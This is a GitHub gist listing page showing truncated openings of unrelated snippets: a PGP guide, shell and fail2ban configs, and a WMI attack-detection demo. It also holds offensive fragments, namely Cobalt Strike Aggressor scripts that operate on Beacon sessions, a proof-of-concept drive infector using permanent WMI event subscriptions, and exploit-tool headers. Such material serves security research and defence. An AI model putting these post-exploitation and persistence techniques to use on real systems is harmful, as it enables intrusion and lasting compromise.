Skip to content

Instantly share code, notes, and snippets.

@grugq
grugq / gist:03167bed45e774551155
Last active October 30, 2024 02:44
operational pgp - draft

Operational PGP

This is a guide on how to email securely.

There are many guides on how to install and use PGP to encrypt email. This is not one of them. This is a guide on secure communication using email with PGP encryption. If you are not familiar with PGP, please read another guide first. If you are comfortable using PGP to encrypt and decrypt emails, this guide will raise your security to the next level.

_qvm-run() {
local app_vms
app_vms=( $(qvm-ls --raw-list|grep -v "^dom0$") )
local exc=
if (( words[(I)--all] )); then
exc="*--exclude=[When --all is used: exclude this VM name (may be repeated)]:QubesVMs:($app_vms)"
fi
_arguments -S '(-a --auto)'{-a,--auto}'[Auto start the VM if not running]'\
@Belphemur
Belphemur / iptables-tarpit.conf
Last active October 10, 2022 18:29
Tarpit Action for Fail2ban with rate limit
# Fail2Ban configuration file
#
# Author: Cyril Jaquier
# Modified: Yaroslav O. Halchenko <[email protected]>
# made active on all ports from original iptables.conf
# Modified: Antoine Aflalo <[email protected]>
# Used the iptables-allports.conf as base for TARPIT.
#
#
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
@mattifestation
mattifestation / WMI_attack_detection.ps1
Last active March 16, 2021 23:02
BlueHat 2016 - WMI attack detection demo
#region Scriptblocks that will execute upon alert trigger
$LateralMovementDetected = {
$Event = $EventArgs.NewEvent
$EventTime = [DateTime]::FromFileTime($Event.TIME_CREATED)
$MethodName = $Event.MethodName
$Namespace = $Event.Namespace
$Object = $Event.ObjectPath
$User = $Event.User
# getexplorerpid($bid, &callback);
sub getexplorerpid {
bps($1, lambda({
local('$pid $name $entry');
foreach $entry (split("\n", $2)) {
($name, $pid) = split("\\s+", $entry);
if ($name eq "explorer.exe") {
# $1 is our Beacon ID, $pid is the PID of explorer.exe
[$callback: $1, $pid];
}
@SadProcessor
SadProcessor / Get-RickAstley.ps1
Created March 21, 2016 23:46
Not intended for nefarious purposes...
function Get-RickAstley(){
[console]::beep(440,150)#A
[console]::beep(493,150)#B
[console]::beep(587,150)#D
[console]::beep(493,150)#B
Start-Sleep -m 20
[console]::beep(698,400)#F
[console]::beep(698,400)#F
[console]::beep(659,500)#E
Start-Sleep -m 50
@rsmudge
rsmudge / getenv.cna
Last active December 11, 2019 19:45
#
# Aggressor Script means to parse/use environment vars in a Beacon session.
#
global('%bvars');
# request environment variables for every new Beacon that comes in.
on beacon_initial {
# ideally, we'd have a bshell that could take callbacks. We don't have
# this yet. Eventually though, we will.
@mattifestation
mattifestation / sample_drive_infector.ps1
Created April 2, 2016 18:18
A PoC drive infector using permanent WMI event subscriptions. I wrote this to demonstrate passing __EventFilter arguments to a CommandLineEventConsumer
$EventFilterArgs = @{
EventNamespace = 'root/cimv2'
Name = 'DriveChanged'
Query = 'SELECT * FROM Win32_VolumeChangeEvent'
QueryLanguage = 'WQL'
}
$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs
$CommandLineConsumerArgs = @{
import dpkt, socket, struct, binascii, sys, time, random
if len(sys.argv) < 2:
print "Usage: poc.py pcapfile"
print "PCAP file must contain only the UDP packets of a Steam connection."
sys.exit(1)
capture = dpkt.pcap.Reader(open(sys.argv[1]))
cap_messages_out = []
cap_messages_in = []